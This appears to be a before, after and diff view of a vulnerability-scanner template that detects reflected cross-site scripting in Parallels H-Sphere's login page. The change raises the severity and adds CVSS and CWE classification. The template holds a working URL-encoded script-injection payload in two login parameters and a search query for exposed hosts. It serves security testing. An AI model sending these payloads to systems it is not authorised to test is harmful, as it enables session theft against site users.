vulnerabilities/other/parallels-hsphere-xss.yaml (before)
id: parallels-hsphere-xss

info:
  name: Parallels H-Sphere - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    H-Sphere is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
  reference:
    - https://www.exploit-db.com/exploits/32396
  metadata:
    verified: true
    shodan-query: title:"h-sphere"
  tags: hsphere,xss,edb,parallels

requests:
  - method: GET
    path:
      - '{{BaseURL}}/webshell4/login.php?err=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
      - '{{BaseURL}}/webshell4/login.php?login=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: word
        words:
          - 'value="\"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

vulnerabilities/other/parallels-hsphere-xss.yaml (after)
id: parallels-hsphere-xss

info:
  name: Parallels H-Sphere - Cross-Site Scripting
  author: ritikchaddha
  severity: high
  description: |
    Parallels H-Sphere contains multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
  reference:
    - https://www.exploit-db.com/exploits/32396
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    shodan-query: title:"h-sphere"
  tags: hsphere,xss,edb,parallels

requests:
  - method: GET
    path:
      - '{{BaseURL}}/webshell4/login.php?err=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
      - '{{BaseURL}}/webshell4/login.php?login=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: word
        words:
          - 'value="\"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/23

vulnerabilities/other/parallels-hsphere-xss.yaml (diff)
@@ -3,11 +3,15 @@ id: parallels-hsphere-xss
 info:
   name: Parallels H-Sphere - Cross-Site Scripting
   author: ritikchaddha
-  severity: medium
+  severity: high
   description: |
-    H-Sphere is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+    Parallels H-Sphere contains multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
   reference:
     - https://www.exploit-db.com/exploits/32396
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   metadata:
     verified: true
     shodan-query: title:"h-sphere"
@@ -35,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/23
